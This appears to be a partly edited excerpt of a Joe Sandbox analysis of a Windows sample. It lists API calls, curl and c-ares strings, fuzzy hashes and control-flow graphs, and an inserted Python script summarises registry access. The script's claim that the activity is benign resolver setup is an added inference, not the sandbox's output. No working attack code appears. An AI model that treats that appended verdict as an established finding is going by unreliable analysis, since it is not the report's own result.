                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61b0ea8730309298aa04babd3c808097f1a3d26a0e8ef281a5e8efca1e5d87d1
                                                              • Instruction ID: 10eeea50677539946b5a0fb8a35b11484ecf9050fd763dcc0a7739b093506b15
                                                              • Opcode Fuzzy Hash: 61b0ea8730309298aa04babd3c808097f1a3d26a0e8ef281a5e8efca1e5d87d1
                                                              • Instruction Fuzzy Hash: E291023160D3494BD7358A28CC907BBB2E5EFD6364F189B2CE8A9431D4EB74DC40D6A1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                               control_flow_graph: function at 00E5B180 (basic blocks e5b180 through e5b589); calls getsockname and the internal subroutines e5af30, e5b060, e5b020, e5b590, e5b660, e5b770, e5b870 and 1118b00. The rendered graph is not reproduced here.
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 00E5B2B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                               • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: d6fbd614d9e2d3ac80e3bfbc0b52655b8512ec935425144e202939b4be64b47a
                                                              • Instruction ID: a8cba1f9a795b9080e42a064eaf136de6fd2c6b94dacdd56f85d997ecba0ad97
                                                              • Opcode Fuzzy Hash: d6fbd614d9e2d3ac80e3bfbc0b52655b8512ec935425144e202939b4be64b47a
                                                              • Instruction Fuzzy Hash: 6BC16E716043059FD718DF24C881A6A77E2FF88349F14996CF849AB3A1E771ED49CB81
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00E4712E,?,?,?,00001001,00000000), ref: 00E5A90D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                               • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: 4c01a59c3e246b0812fceb7eb3cbc8156bf675f92870388c606bac1401e5eae6
                                                              • Instruction ID: 60ff32546efedfecb8ac3fe16fc0023f632b845c4c2dd242a636c2a2613dbe84
                                                              • Opcode Fuzzy Hash: 4c01a59c3e246b0812fceb7eb3cbc8156bf675f92870388c606bac1401e5eae6
                                                              • Instruction Fuzzy Hash: 37F06D75208318AFD2109E01EC44D7BBBEDFFC9758F058A6DFD48232118270AE14CAB2
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E4AA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E4AA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00E4AA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00E4AAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00E4AB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 00E4AB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00E4AB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00E4AC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00E4AD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 00E4AD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 00E4ADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 00E4AE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00E4AE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E4AE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00E4AF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00E4AFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00E4B072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                               • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4217438148-1047472027
                                                              • Opcode ID: fdd073c5fed68d255bb89fa006db6d3ef4803047d6f3acac5159646247fa4402
                                                              • Instruction ID: b246ed0a5bf134351e343f8ff59ddaf805c0ba99c3ae4cdbbdb81d422143216c
                                                              • Opcode Fuzzy Hash: fdd073c5fed68d255bb89fa006db6d3ef4803047d6f3acac5159646247fa4402
                                                              • Instruction Fuzzy Hash: 6E72B1B1644301AFE3209F24EC81B5BB7E8EF85714F185828F985EB291E775E944CB63
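                                                               As an added triage aid (this is not part of the Joe Sandbox report and not code from the sample), the Python below parses API lines in the format used by the listings above and summarises a function's registry activity: the hive, the key path, the requested rights decoded from the samDesired mask, the values queried under each opened key, and whether any write API appears. The input is a constructed excerpt of this function's listing. Because the report prints handles as `?`, values are attributed to the most recently opened key, which is a heuristic. A read-only walk of `Tcpip\Parameters`, the two `DNSClient` policy keys and the per-interface keys for `SearchList`, `Domain` and `DhcpDomain` is the Windows resolver-configuration lookup performed by c-ares (the neighbouring function carries the `ares__sortaddrinfo.c` string), so this registry access is consistent with statically linked resolver setup rather than with credential collection.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report and summarise
which registry hives, keys and values a function touches, and with what access.
Added example; the sample input below is a constructed excerpt of the report."""
import re
from dataclasses import dataclass, field

# Constructed excerpt of the registry-reading function's API listing.
SAMPLE_API_LINES = r"""
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E4AA19
• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E4AA4C
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00E4AAE9
• RegCloseKey.KERNELBASE(?), ref: 00E4AB6A
• RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00E4AB82
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00E4AD0A
• RegEnumKeyExA.KERNELBASE ref: 00E4AD8D
• RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00E4AE2A
• RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00E4B072
• getsockname.WS2_32(-00000020,-00000020,?), ref: 00E5B2B6
"""

# Predefined hive handles as they appear in the first RegOpenKeyExA argument.
HIVES = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM",
         0x80000003: "HKU", 0x80000005: "HKCC"}
# Composite registry rights first, then individual bits of samDesired.
COMPOSITE_RIGHTS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
ACCESS_BITS = {0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE",
               0x0004: "KEY_CREATE_SUB_KEY", 0x0008: "KEY_ENUMERATE_SUB_KEYS",
               0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK", 0x20000: "READ_CONTROL"}
WRITE_APIS = {"RegSetValueExA", "RegSetValueExW", "RegCreateKeyExA", "RegCreateKeyExW",
              "RegDeleteValueA", "RegDeleteValueW", "RegDeleteKeyA", "RegDeleteKeyW"}

# "• Api.Module(arg,arg,...), ref: ADDR" or, without arguments, "• Api.Module ref: ADDR"
API_LINE = re.compile(r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)"
                      r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


@dataclass
class KeyAccess:
    hive: str
    path: str
    rights: list
    values: list = field(default_factory=list)


@dataclass
class RegistrySummary:
    keys: list = field(default_factory=list)
    enumerates_subkeys: bool = False
    writes: bool = False


def parse_api_lines(text):
    """Return the ApiCall records found in a block of report lines; skip anything else."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def decode_rights(sam):
    """Decode a hex samDesired mask into named registry rights."""
    try:
        mask = int(sam, 16)
    except ValueError:
        return [sam]  # the report could not resolve the argument
    if mask in COMPOSITE_RIGHTS:
        return [COMPOSITE_RIGHTS[mask]]
    return [name for bit, name in ACCESS_BITS.items() if mask & bit] or [hex(mask)]


def summarise_registry(calls):
    """Group opened keys with the values queried under them and flag write APIs."""
    summary = RegistrySummary()
    current = None  # heuristic: handles print as "?", so use the last opened key
    for c in calls:
        if c.api.startswith("RegOpenKeyEx") and len(c.args) >= 4:
            try:
                hive = HIVES.get(int(c.args[0], 16), c.args[0])
            except ValueError:
                hive = "<handle>"  # subkey opened under a previously opened key
            current = KeyAccess(hive, c.args[1], decode_rights(c.args[3]))
            summary.keys.append(current)
        elif c.api.startswith("RegQueryValueEx") and len(c.args) >= 2:
            if current is not None and c.args[1] not in current.values:
                current.values.append(c.args[1])
        elif c.api.startswith("RegEnumKeyEx"):
            summary.enumerates_subkeys = True
        elif c.api.startswith("RegCloseKey"):
            current = None
        if c.api in WRITE_APIS:
            summary.writes = True
    return summary


if __name__ == "__main__":
    s = summarise_registry(parse_api_lines(SAMPLE_API_LINES))
    for k in s.keys:
        print(f"{k.hive}\\{k.path} [{', '.join(k.rights)}] values={k.values}")
    print("enumerates subkeys:", s.enumerates_subkeys, "| writes:", s.writes)
```

                                                               Feed it the "APIs" block of any function in the report; a function that opens keys with KEY_WRITE or calls a RegSet/RegCreate API would be flagged by `writes`, which is the distinction that matters when deciding whether registry activity is configuration lookup or persistence.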
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00DCA832
                                                              Strings
                                                              • Bind to local port %d failed, trying next, xrefs: 00DCAFE5
                                                              • cf-socket.c, xrefs: 00DCA5CD, 00DCA735
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00DCAD0A
                                                              • Could not set TCP_NODELAY: %s, xrefs: 00DCA871
                                                              • bind failed with errno %d: %s, xrefs: 00DCB080
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 00DCADAC
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 00DCA796
                                                              • Trying [%s]:%d..., xrefs: 00DCA689
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 00DCAE60
                                                              • Local port: %hu, xrefs: 00DCAF28
                                                              • Trying %s:%d..., xrefs: 00DCA7C2, 00DCA7DE
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00DCA6CE
                                                              • @, xrefs: 00DCA8F4
                                                              • @, xrefs: 00DCAC42
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 00DCAE1F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                               • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: 1c324e15f74b4ba0114c59403f2c836f6cc1e8227284162d6831d223cff3dcce
                                                              • Instruction ID: c0f2762b20b49c2bd47ed1d5f6b61ad9c0ecfbf336f123ac605fb265a4e47c88
                                                              • Opcode Fuzzy Hash: 1c324e15f74b4ba0114c59403f2c836f6cc1e8227284162d6831d223cff3dcce
                                                              • Instruction Fuzzy Hash: 4B62F671504346ABE7258F28C845FABB7E5FF81318F08491DF98897291E771E845CBA3

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                               control_flow_graph: function at 00E59740 (basic blocks e59740 through e5a070); calls RegOpenKeyExA, RegQueryValueExA and RegCloseKey plus numerous internal subroutines (among them e578a0, e55ca0, e55d00, e563f0, e4e2b0, e4e960, e4ebf0 and 1118b70). The rendered graph is not reproduced here.
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E59946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00E59974
                                                              • RegCloseKey.KERNELBASE(?), ref: 00E5998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                              • API String ID: 3677997916-4129964100
                                                              • Opcode ID: 03a429fb3f4a918899c394f308df38ce7fdd45a5bb061ba8668a6b4a34fbc540
                                                              • Instruction ID: 6be3f39391a101bc910ab02838ca67644e08b113934121fc3b17f0115de55a6b
                                                              • Opcode Fuzzy Hash: 03a429fb3f4a918899c394f308df38ce7fdd45a5bb061ba8668a6b4a34fbc540
                                                              • Instruction Fuzzy Hash: 733294B5904201ABEB11AB24FC42A5B77E4AF94319F085C34FD49B7263F721E918D763

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1272 dc8b50-dc8b69 1273 dc8b6b-dc8b74 1272->1273 1274 dc8be6 1272->1274 1276 dc8beb-dc8bf2 1273->1276 1277 dc8b76-dc8b8d 1273->1277 1275 dc8be9 1274->1275 1275->1276 1278 dc8b8f-dc8ba7 call da6e40 1277->1278 1279 dc8bf3-dc8bfe call dca550 1277->1279 1286 dc8bad-dc8baf 1278->1286 1287 dc8cd9-dc8d16 SleepEx getsockopt 1278->1287 1284 dc8de4-dc8def 1279->1284 1285 dc8c04-dc8c08 1279->1285 1290 dc8e8c-dc8e95 1284->1290 1291 dc8df5-dc8e19 call dca150 1284->1291 1292 dc8dbd-dc8dc3 1285->1292 1293 dc8c0e-dc8c1d 1285->1293 1294 dc8bb5-dc8bb9 1286->1294 1295 dc8ca6-dc8cb0 1286->1295 1288 dc8d18-dc8d20 1287->1288 1289 dc8d22 1287->1289 1296 dc8d26-dc8d39 1288->1296 1289->1296 1297 dc8e97-dc8e9c 1290->1297 1298 dc8f00-dc8f06 1290->1298 1327 dc8e88 1291->1327 1328 dc8e1b-dc8e26 1291->1328 1292->1275 1300 dc8c1f-dc8c30 connect 1293->1300 1301 dc8c35-dc8c48 call dca150 1293->1301 1294->1276 1303 dc8bbb-dc8bc2 1294->1303 1295->1287 1302 dc8cb2-dc8cb8 1295->1302 1306 dc8d3b-dc8d3d 1296->1306 1307 dc8d43-dc8d61 call dad8c0 call dca150 1296->1307 1308 dc8e9e-dc8eb6 call da2a00 1297->1308 1309 dc8edf-dc8eef call d978b0 1297->1309 1298->1276 1300->1301 1329 dc8c4d-dc8c4f 1301->1329 1311 dc8ddc-dc8dde 1302->1311 1312 dc8cbe-dc8cd4 call dcb180 1302->1312 1303->1276 1304 dc8bc4-dc8bcc 1303->1304 1313 dc8bce-dc8bd2 1304->1313 1314 dc8bd4-dc8bda 1304->1314 1306->1307 1306->1311 1339 dc8d66-dc8d74 1307->1339 1308->1309 1333 dc8eb8-dc8edd call da3410 * 2 1308->1333 1331 dc8ef2-dc8efc 1309->1331 1311->1275 1311->1284 1312->1284 1313->1276 1313->1314 1314->1276 1322 dc8bdc-dc8be1 1314->1322 1330 dc8dac-dc8db8 call dd50a0 1322->1330 1327->1290 1334 dc8e2e-dc8e85 call dad090 call dd4fd0 1328->1334 1335 dc8e28-dc8e2c 1328->1335 1336 dc8c8e-dc8c93 1329->1336 1337 dc8c51-dc8c58 1329->1337 1330->1276 1331->1298 1333->1331 1334->1327 1335->1327 1335->1334 1344 dc8dc8-dc8dd9 call dcb100 1336->1344 1345 dc8c99-dc8c9f 
1336->1345 1337->1336 1342 dc8c5a-dc8c62 1337->1342 1339->1276 1346 dc8d7a-dc8d81 1339->1346 1349 dc8c6a-dc8c70 1342->1349 1350 dc8c64-dc8c68 1342->1350 1344->1311 1345->1295 1346->1276 1352 dc8d87-dc8d8f 1346->1352 1349->1336 1355 dc8c72-dc8c8b call dd50a0 1349->1355 1350->1336 1350->1349 1357 dc8d9b-dc8da1 1352->1357 1358 dc8d91-dc8d95 1352->1358 1355->1336 1357->1276 1359 dc8da7 1357->1359 1358->1276 1358->1357 1359->1330
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 00DC8C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 00DC8CF3
                                                              • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00DC8D0E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnectgetsockopt
